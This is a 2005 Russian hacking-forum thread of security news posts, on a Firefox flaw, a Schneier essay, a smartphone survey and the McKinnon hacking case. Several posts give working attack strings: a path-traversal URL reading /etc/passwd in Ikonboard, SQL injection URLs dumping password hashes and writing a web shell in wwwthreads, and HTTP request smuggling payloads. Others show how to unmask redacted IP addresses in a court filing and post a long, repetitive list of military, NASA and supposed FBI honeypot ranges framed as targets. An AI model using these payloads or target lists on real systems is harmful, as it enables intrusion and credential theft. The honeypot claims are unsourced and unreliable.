Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   Безопасность & Хакерство (https://forum.antichat.xyz/showthread.php?t=6992)

k00p3r 08.06.2005 11:27

Безопасность & Хакерство
 
Здесь размещаем новости связанные с компьютерной безопасностью и хакерством.
Все сообщения подобной тематики, вне этой темы будут удаляться.

k00p3r 08.06.2005 13:00

Дыра в Mozilla/Firefox
 
Согласно известной датской компании Secunia в браузерах Mozilla и Firefox обнаружена уязвимость в реализации фреймов,которая потенциально может использоваться с целью кражи конфиденциальной информации пользователя.
Подробности: http://secunia.com/advisories/15601/

DRON-ANARCHY 08.06.2005 23:15

разгул точно наводящихся вирусов
 
Брюс Шнайер, основатель компании Counterpane Internet Security, известнейший специалист по криптографии, опубликовал на своём сайте эссе, посвящённое тенденциям в сфере сетевых рисков.
Не давая никаких особых оценок, Шнайер просто перечисляет ожидаемые сценарии, и будущее выглядит весьма мрачно. По мнению Шнайера, в самом ближайшем времени следует ожидать комплексных червей, способных выполнять целый ряд функций, и в качестве примера предлагает вирус KEG.Spybot, который производит анализ общей уязвимости заражённой системы и отсылает отчёт своему автору через IRC-каналы.
Шнайер предсказывает, что Microsoft Internet Information Services (IIS-сервер) будет ещё долго оставаться излюбленной мишенью для хакеров, хотя по мере того, как всё большее число компаний будут мигрировать на Windows 2003 и IIS 6, количество атак против IIS начнёт снижаться. Пиринговые сети, как полагает Шнайер, станут основным каналом первичного распространения вирусов.
Кроме того, Шнайер ожидает скорого появления многочисленных вирусов "точного наведения". "Недавно мы обнаружили вирусы, которые используют сторонние средства сбора информации, в том числе Google, для углублённой разведки. Это приведёт к более эффективным методам распространения: вместо того чтобы распространяться хаотично, вирусы будут наводиться точно по конкретным целям, - прогнозирует Шнайер. - Благодаря тому, что такие мишени будут определяться с помощью сторонних служб, резко снизится количество "шума", который вирусы обычно производят при случайном выборе мишеней, следовательно срок между появлением и первым обнаружением червя резко увеличится".
Вслед за рядом других специалистов Шнайер указывает, что взломы и DDoS-атаки превращаются в теневой бизнес. Хакеры торгуют информацией об обнаруженных уязвимостях, а те из них, в распоряжении которых имеются "зомби-сети", шантажируют коммерсантов, угрожая DDoS-атаками. Шнайер, впрочем, указывает, что большая часть "наездов" хакеры совершают на периферийных коммерсантов - онлайновые казино, игровые и порноресурсы. И чем чаще от хакеров откупаются, тем больше они наглеют.
Впрочем, Шнайер прогнозирует, что в скором времени хакеры начнут атаковать и финансовые учреждения, поскольку онлайновые криминальные элементы ищут новые источники дохода. "Кроме того, ожидается всё больше "инсайдерских" атак с целью наживы. Уже сейчас большая часть целенаправленных атак производится из сетей самих атакованных организаций. Мы также ожидаем увеличения количества политически мотивированных хакерских атак..." - пишет Шнайер.

Компьюлента

DRON-ANARCHY 08.06.2005 23:19

Покупая смартфон подумайте о безопасности
 
Большинство владельцев смартфонов подозревает о скрытой угрозе вирусов, но не предпринимает никаких мер, чтобы обезопасить свои данные от вредоносных программ. Компания Symantec недавно провела небольшое опрос, среди 300 американских граждан. Из всех опрошенных, 73% сообщили, что знакомы с проблемой и понимают, как происходит распространение вирусов в мобильной среде.
Кроме того, более чем 70% выразили озабоченность по этому поводу, т.к. опасаются за конфиденциальность своей информации. За прошлый год было написано множество вирусов, троянов, в том числе и нашумевший Cabir, как известно, атакующий смартфоны на Symbian OS.
Несмотря на риск потери данных, около 55% ответили, что хранят на своих телефонах личные данные, 37% - деловую информацию и 28% - клиентские данные. Как известно, на смартфоны и коммуникаторы вирусы проникают через Интернет, и, зная это, 64% опрошенных ежедневно работают с электронной корреспонденцией, 56% - используют IM и 46% просто выходят в Интернет. Впрочем, волков бояться, - в лес не ходить...
Интернет - не единственный способ "заразиться", например уже упомянутый Cabir распространяется через Bluetooth. Помимо защиты информации у пользователей появилась еще одна головная боль - "банкинг". 41% активно совершают финансовые расчеты через банковский онлайн сервис. По мнению 57%, пассивная безопасность существующих смартфонов куда ниже ПК, хотя это ошибочное мнение, уверяет Мэт Экрам (Matt Ekram), менеджер отдела безопасности Symantec.

Crime-research

k00p3r 12.06.2005 09:01

bug to [ IkonBoard v2.1.7b]
 
Уязвимость найдена в скрипте topic.cgi в форуме Ikonboard v2.1.7b. Удалённый пользователь может выполнить следующий сценарий и получить например, /etc/passwd:

http://127.0.0.1/topic.cgi?forum=[x]&topic= ../../../../../../../../etc/passwd%00


Так же имеется simple-sploit для эксплуатации бага, который можно взять - http://clkiller.net/release/ikonb217b.rar

Источник: www.ru24-team.net

k00p3r 12.06.2005 09:06

wwwthreads [all versions] - SQL-injection
 
Уязвимость позволяет получить DES-хеш любого пользователя, создать веб-шелл, получить доступ к важной служебной информации. Использование:

Получение хеша пароля:
http://target/viewmessage.php?Cat=&m...om%20w3t_Users where U_Username='admin'

Получение учетных записей к БД:
http://target/viewmessage.php?Cat=&m...m%20mysql.user where User='root'

Создание веб-шелла (при наличии прав на запись):
http://target/viewmessage.php?Cat=&m...б_шелла into outfile 'path_to_file/file.php'

Источник: www.cyberlords.net

k00p3r 13.06.2005 13:44

В интернете появился список Ip-адресов секретных компьютеров США
 
P-адреса ряда компьютеров, принадлежащих американским военным ведомствам, может без особого труда узнать любой желающий. Все, что для этого нужно сделать - загрузить из интернета небольшой файл в формате PDF размером в 300 кб.
(http://news.findlaw.com/hdocs/docs/c...k1102vaind.pdf)
Как сообщает Lenta.ru, файл о котором идет речь, появился на веб-сайте публичной американской правовой базы FindLaw.com в связи с делом тридцатидевятилетнего хакера Гари Маккиннона. Безработный Маккиннон, известный под прозвищем Solo, был арестован несколько дней назад в Лондоне по подозрению в совершении взлома компьютерных сетей Министерства обороны США и NASA.

В 2002 году подозреваемый, предположительно, проник в один из военных компьютеров на базе Форт-Майер в штате Виржиния, уничтожил порядка 1300 пользовательских аккаунтов и важную информацию. Восстановительные работы обошлись правительству почти в миллион долларов. Если вина Маккиннона будет доказана, ему может грозить крупный штраф и тюремное заключение на срок до 70 лет.

Обвинительное заключение против Маккиннона на днях появилось на сайте FindLaw.com. Причем в файле, помимо описания противоправных действий хакера, приведен список IP-адресов компьютеров, которые Маккиннон незаконно взломал, а также список военных баз, к которым эти адреса относятся. Подобная информация, естественно, является закрытой, в связи с чем сами IP-адреса в документе закрашены черным цветом. Тем не менее, если выделить "секретную" таблицу, а затем скопировать ее и вставить, например, в текстовый редактор Microsoft Word, защищенные цифровые последовательности становятся видны.

Понятно, что одно лишь знание IP-адресов не позволит получить беспрепятственный доступ к секретным компьютерам. Однако данная информация может облегчить для хакеров поиск потенциально слабых мест в защите сетей военных ведомств США. Кроме того, любой из этих адресов может быть подвергнут распределенной DoS-атаке.

k00p3r 13.06.2005 18:05

В PDF указанной выше все ip-адреса замазаны....но не отчаивайтесь....просто эти адреса неплохо укрыты от глаз простых смертных - я нашёл способ как их просмотреть.Просто копируете замазаные адреса и вставляете в блокнот, там появятся скрытые от глаз ип-адреса!=)

Rebz 13.06.2005 18:21

Чтобы не ходить вокург да около нате сразу вам списочек. Взято из ЖЖ xblp-а.

ФБР под прицелом :))

207.60.x.x and 207.61.x.x - FBI Linux servers used to trap scanners.

Also:


64.224.*
64.225.*
64.226.*
195.10.*
205.96.* - 205.103.*
207.30.* - 207.120.*
207.60.* - 207.61.*
209.35.*
216.25.* <-- (only to catch scanners)
216.247.* <-- (only to catch scanners)
62.0.0.1 - 62.30.255.255

6.*.*.* - Army Information Systems Center
21.*.*.* - US Defense Information Systems Agency
22.*.*.* - Defense Information Systems Agency
26.*.*.* - Defense Information Systems Agency
29.*.*.* - Defense Information Systems Agency
30.*.*.* - Defense Information Systems Agency
49.*.*.* - Joint Tactical Command
50.*.*.* - Joint Tactical Command
55.*.*.* - Army National Guard Bureau
64.224.*.*
64.225.*.*
64.226.*.*
195.10.*
205.96.* - 205.103.*
207.30.* - 207.120.*
207.60.* - 207.61.*
209.35.*.*
216.25.* <-- (only to catch scanners)
216.247.* <-- (only to catch scanners)
217.6.*.*
155.7.0.0 American Forces Information (NET-AFISHQ-NET1)
155.8.0.0 U.S. ArmyFort Gordon (NET-GORDON-NET5)
155.9.0.0 United States Army Information Systems Command (NET-LWOOD-NET2)
155.74.0.0 PEO STAMIS (NET-CEAP2)
155.75.0.0 US Army Corps of Engineers (NET-CEAP3)
155.76.0.0 PEO STAMIS (NET-CEAP4)
155.77.0.0 PEO STAMIS (NET-CEAP5)
155.78.0.0 PEO STAMIS (NET-CEAP6)
155.79.0.0 US Army Corps of Engineers (NET-CEAP7)
155.80.0.0 PEO STAMIS (NET-CEAP
155.81.0.0 PEO STAMIS (NET-CEAP9)
155.82.0.0 PEO STAMIS (NET-CEAP10)
155.83.0.0 US Army Corps of Enginers (NET-CEAP11)
155.84.0.0 PEO STAMIS (NET-CEAP12)
155.85.0.0 PEO STAMIS (NET-CEAP13)
155.86.0.0 US Army Corps of Engineers (NET-CEAP14)
155.87.0.0 PEO STAMIS (NET-CEAP15)
155.88.0.0 PEO STAMIS (NET-CEAP16)
155.178.0.0 Federal Aviation Administration (NET-FAA)
155.213.0.0 USAISC Fort Benning (NET-FTBENNNET3
155.214.0.0 Director of Information Management (NET-CARSON-TCACC )
155.215.0.0 USAISC-FT DRUM (NET-DRUM-TCACCIS)
155.216.0.0 TCACCIS Project Management Office (NET-FTDIX-TCACCI)
155.217.0.0 Directorate of Information Management (NET- EUSTIS-EMH1)
155.218.0.0 USAISC (NET-WVA-EMH2)
155.219.0.0 DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
155.220.0.0 USAISC-DOIM (NET-FTKNOX-NET4)
155.221.0.0 USAISC-Ft Ord (NET-FTORD-NET2)
128.47.0.0 Army Communications Electronics Command (NET-TACTNET)
128.50.0.0 Department of Defense (NET-COINS)
128.51.0.0 Department of Defense (NET-COINSTNET)
128.56.0.0 U.S. Naval Academy (NET-USNA-NET)
128.63.0.0 Army Ballistics Research Laboratory (NET-BRL-SUBNET)
128.80.0.0 Army Communications Electronics Command (CECOM) (NET-CECOMNET)
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency (NET-DERA-UK)
128.154.0.0 NASA Wallops Flight Facility (NET-WFF-NET)
128.155.0.0 NASA Langley Research Center (NET-LARC-NET)
128.156.0.0 NASA Lewis Network Control Center (NET- LERC)
128.157.0.0 NASA Johnson Space Center (NET-JSC-NET)
128.158.0.0 NASA Ames Research Center (NET-MSFC-NET)
128.159.0.0 NASA Ames Research Center (NET-KSC-NET)
128.160.0.0 Naval Research Laboratory (NET- SSCNET)
128.161.0.0 NASA Ames Research Center (NET-NSN-NET)
128.183.0.0 NASA Goddard Space Flight Center (NET-GSFC)
128.216.0.0 MacDill Air Force Base (NET-CC-PRNET)
128.217.0.0 NASA Kennedy Space Center (NET-NASA-KSC-OIS)
128.236.0.0 U.S. Air Force Academy (NET-USAFA-NET)

207.60-61.*.* : FBI Linux servers used to trap scanners
62.0-30.*.* :
64.224.*.* :
64.225.*.* :
64.226.*.* :
195.10.* :
205.96-103.* :
207.30-120.* :
207.60-61.* :
209.35.*.* :
216.25.* : (only to catch scanners)
216.247.* : (only to catch scanners)
217.6.*.* :
155.7.*.* : American Forces Information (NET-AFISHQ-NET1)
155.8.*.* : U.S. ArmyFort Gordon (NET-GORDON-NET5)
155.9.*.* : United States Army Information Systems Command (NET-LWOOD-NET2)
155.74.*.* : PEO STAMIS (NET-CEAP2)
155.75.*.* : US Army Corps of Engineers (NET-CEAP3)
155.76.*.* : PEO STAMIS (NET-CEAP4)
155.77.*.* : PEO STAMIS (NET-CEAP5)
155.78.*.* : PEO STAMIS (NET-CEAP6)
155.79.*.* : US Army Corps of Engineers (NET-CEAP7)
155.80.*.* : PEO STAMIS (NET-CEAP
155.81.*.* : PEO STAMIS (NET-CEAP9)
155.82.*.* : PEO STAMIS (NET-CEAP10)
155.83.*.* : US Army Corps of Enginers (NET-CEAP11)
155.84.*.* : PEO STAMIS (NET-CEAP12)
155.85.*.* : PEO STAMIS (NET-CEAP13)
155.86.*.* : US Army Corps of Engineers (NET-CEAP14)
155.87.*.* : PEO STAMIS (NET-CEAP15)
155.88.*.* : PEO STAMIS (NET-CEAP16)
155.178.*.* : Federal Aviation Administration (NET-FAA)
155.213.*.* : USAISC Fort Benning (NET-FTBENNNET3
155.214.*.* : Director of Information Management (NET-CARSON-TCACC )
155.215.*.* : USAISC-FT DRUM (NET-DRUM-TCACCIS)
155.216.*.* : TCACCIS Project Management Office (NET-FTDIX-TCACCI)
155.217.*.* : Directorate of Information Management (NET- EUSTIS-EMH1)
155.218.*.* : USAISC (NET-WVA-EMH2)
155.219.*.* : DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
155.220.*.* : USAISC-DOIM (NET-FTKNOX-NET4)
155.221.*.* : USAISC-Ft Ord (NET-FTORD-NET2)
128.47.*.* : Army Communications Electronics Command (NET-TACTNET)
128.50.*.* : Department of Defense (NET-COINS)
128.51.*.* : Department of Defense (NET-COINSTNET)
128.56.*.* : U.S. Naval Academy (NET-USNA-NET)
128.63.*.* : Army Ballistics Research Laboratory (NET-BRL-SUBNET)
128.80.*.* : Army Communications Electronics Command (CECOM) (NET-CECOMNET)
128.98.*.* : Defence Evaluation and Research Agency (NET-DERA-UK)
128.154.*.* : NASA Wallops Flight Facility (NET-WFF-NET)
128.155.*.* : NASA Langley Research Center (NET-LARC-NET)
128.156.*.* : NASA Lewis Network Control Center (NET- LERC)
128.157.*.* : NASA Johnson Space Center (NET-JSC-NET)
128.158.*.* : NASA Ames Research Center (NET-MSFC-NET)
128.159.*.* : NASA Ames Research Center (NET-KSC-NET)
128.160.*.* : Naval Research Laboratory (NET- SSCNET)
128.161.*.* : NASA Ames Research Center (NET-NSN-NET)
128.183.*.* : NASA Goddard Space Flight Center (NET-GSFC)
128.216.*.* : MacDill Air Force Base (NET-CC-PRNET)
128.217.*.* : NASA Kennedy Space Center (NET-NASA-KSC-OIS)
128.236.*.* : U.S. Air Force Academy (NET-USAFA-NET

207.60-61.*.* : FBI Linux servers used to trap scanners
6.*.*.* : Army Information Systems Center
21.*.*.* : US Defense Information Systems Agency
6.*.*.* : Army Information Systems Center
21.*.*.* : US Defense Information Systems Agency
22.*.*.* : Defense Information Systems Agency
26.*.*.* : Defense Information Systems Agency
29.*.*.* : Defense Information Systems Agency
30.*.*.* : Defense Information Systems Agency
49.*.*.* : Joint Tactical Command
50.*.*.* : Joint Tactical Command
55.*.*.* : Army National Guard Bureau
22.*.*.* : Defense Information Systems Agency
26.*.*.* : Defense Information Systems Agency
29.*.*.* : Defense Information Systems Agency
30.*.*.* : Defense Information Systems Agency
49.*.*.* : Joint Tactical Command
50.*.*.* : Joint Tactical Command
55.*.*.* : Army National Guard Bureau
62.0-30.*.* :
64.224.*.* :
64.225.*.* :
64.226.*.* :
195.10.* :
205.96-103.* :
207.30-120.* :
207.60-61.* :
209.35.*.* :
216.25.* : (only to catch scanners)
216.247.* : (only to catch scanners)
217.6.*.* :
207.60.2.128 - 207.60.2.255 Abacus Technology (NETBLK-TIAC-ABACUSTC)
64.224.* : (FBI's honeypot)
64.225.* : (FBI's honeypot)
64.226.* : (FBI's honeypot)
195.10.* : (FBI's honeypot)
205.96-103.* : (FBI's honeypot)
207.30-120.* : (FBI's honeypot)
207.60-61.* : (FBI's honeypot)
209.35.* : (FBI's honeypot)
216.25.* : (FBI's honeypot)
216.247.* : (FBI's honeypot)
212.159.40.211 : (FBI's honeypot)
212.159.41.173 : (FBI's honeypot)
212.159.0.2 : (FBI's honeypot)
212.159.1.1 : (FBI's honeypot)
212.159.1.4 : (FBI's honeypot)
212.159.1.5 : (FBI's honeypot)
212.56.107.22 : (FBI's honeypot)
212.159.0.2 : (FBI's honeypot)
212.159.33.56 : (FBI's honeypot)
212.56.107.22 : (FBI's honeypot)
139.142.*.* : 139.142.153.23

k00p3r 16.06.2005 17:52

Новая техника Http атак
 
Группа исследователей опубликовала документ описывающий новый вид атаки - "HTTP Request Smuggling" (HRS), направленный на подмену страниц в кеше прокси серверов и обход блокировок контент фильтров и фаерволов.

Идея метода - компоновка нескольких POST/GET запросов в рамках одного HTTP обращения, например:


1 POST http://SITE/foobar.html HTTP/1.1
2 Host: SITE
3 Connection: Keep-Alive
4 Content-Type: application/x-www-form-urlencoded
5 Content-Length: 0
6 Content-Length: 44
7 [CRLF]
8 GET /poison.html HTTP/1.1
9 Host: SITE
10 Bla: [space after the "Bla:", but no CRLF]
11 GET http://SITE/page_to_poison.html HTTP/1.1
12 Host: SITE
13 Connection: Keep-Alive
14 [CRLF]

Пример 2:

1 POST /some_script.jsp HTTP/1.0
2 Connection: Keep-Alive
3 Content-Type: application/x-www-form-urlencoded
4 Content-Length: 9
5 Content-Length: 204
6
7 this=thatPOST /vuln_page.jsp HTTP/1.0
8 Content-Type: application/x-www-form-urlencoded
9 Content-Length: 95
10
11 param1=value1&data=alert("stealing...


Сообщается, что проблеме подвержены Tomcat, squid (исправлено в Squid-2.5.STABLE9), apache (mod_proxy ?) и т.д.


http://www.watchfire.com/resources/


Время: 03:29